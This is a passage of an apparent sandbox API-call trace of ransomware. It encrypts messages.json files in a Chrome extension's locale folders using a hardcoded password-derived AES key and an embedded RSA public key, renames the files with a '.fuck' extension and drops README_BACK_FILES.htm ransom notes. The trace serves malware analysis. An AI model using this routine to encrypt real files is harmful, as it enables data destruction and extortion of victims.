data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.163] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.163] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.165] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.165] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.165] CryptHashData (hHash=0x2e18128, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.165] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.165] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.165] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.165] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e157d0) returned 1 [0257.165] CryptImportPublicKeyInfo (in: hCryptProv=0x2e157d0, dwCertEncodingType=0x1, pInfo=0x2e2ac00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2ac30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2ac38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19de8) returned 1 [0257.165] CryptEncrypt (in: hKey=0x2e19de8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.166] CryptEncrypt (in: hKey=0x2e19de8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e159f0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e159f0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.166] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e159f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e159f0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.166] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x13e, lpOverlapped=0x0) returned 1 [0257.167] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x13e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x140) returned 1 [0257.167] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x140, lpOverlapped=0x0) returned 1 [0257.168] CloseHandle (hObject=0x5d5c) returned 1 [0257.168] CloseHandle (hObject=0x5d60) returned 1 [0257.168] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json"), bFailIfExists=0) returned 1 [0257.171] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json", dwFileAttributes=0x0) returned 1 [0257.171] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json.gsg")) returned 1 [0257.172] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json.fuck")) returned 1 [0257.173] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.173] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.173] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.173] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.173] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.173] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\readme_back_files.htm")) returned 0xffffffff [0257.173] AreFileApisANSI () returned 1 [0257.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.173] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.174] GetFileType (hFile=0x5d50) returned 0x1 [0257.174] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.175] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.175] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.175] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.175] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.175] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.175] GetLastError () returned 0x0 [0257.175] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json")) returned 0x20 [0257.175] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json", dwFileAttributes=0x80) returned 1 [0257.176] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.176] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.177] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.178] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.180] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.180] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.180] CryptHashData (hHash=0x2e18128, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.180] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.180] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.180] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.180] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e156c0) returned 1 [0257.181] CryptImportPublicKeyInfo (in: hCryptProv=0x2e156c0, dwCertEncodingType=0x1, pInfo=0x2e2ada0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2add0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2add8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19a28) returned 1 [0257.181] CryptEncrypt (in: hKey=0x2e19a28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.181] CryptEncrypt (in: hKey=0x2e19a28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15748*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15748*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.181] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e15748*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15748*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.182] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc8, lpOverlapped=0x0) returned 1 [0257.183] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc8, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0257.183] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0257.183] CloseHandle (hObject=0x5d60) returned 1 [0257.183] CloseHandle (hObject=0x5d5c) returned 1 [0257.183] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json"), bFailIfExists=0) returned 1 [0257.190] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json", dwFileAttributes=0x0) returned 1 [0257.190] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json.gsg")) returned 1 [0257.191] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\messages.json.fuck")) returned 1 [0257.192] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.192] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.192] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.192] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.192] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.192] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\readme_back_files.htm")) returned 0xffffffff [0257.192] AreFileApisANSI () returned 1 [0257.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.192] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.193] GetFileType (hFile=0x5d50) returned 0x1 [0257.193] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.194] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.194] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.195] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.195] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.195] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.195] GetLastError () returned 0x0 [0257.195] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json")) returned 0x20 [0257.195] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json", dwFileAttributes=0x80) returned 1 [0257.196] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.196] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.197] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.197] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.202] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.202] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.202] CryptHashData (hHash=0x2e18128, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.202] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.202] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.202] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.202] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16270) returned 1 [0257.202] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16270, dwCertEncodingType=0x1, pInfo=0x2e2b010*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b040*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b048*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19be8) returned 1 [0257.202] CryptEncrypt (in: hKey=0x2e19be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.203] CryptEncrypt (in: hKey=0x2e19be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15eb8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15eb8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.203] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e15eb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15eb8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.204] ReadFile (in: hFile=0x5d5c, 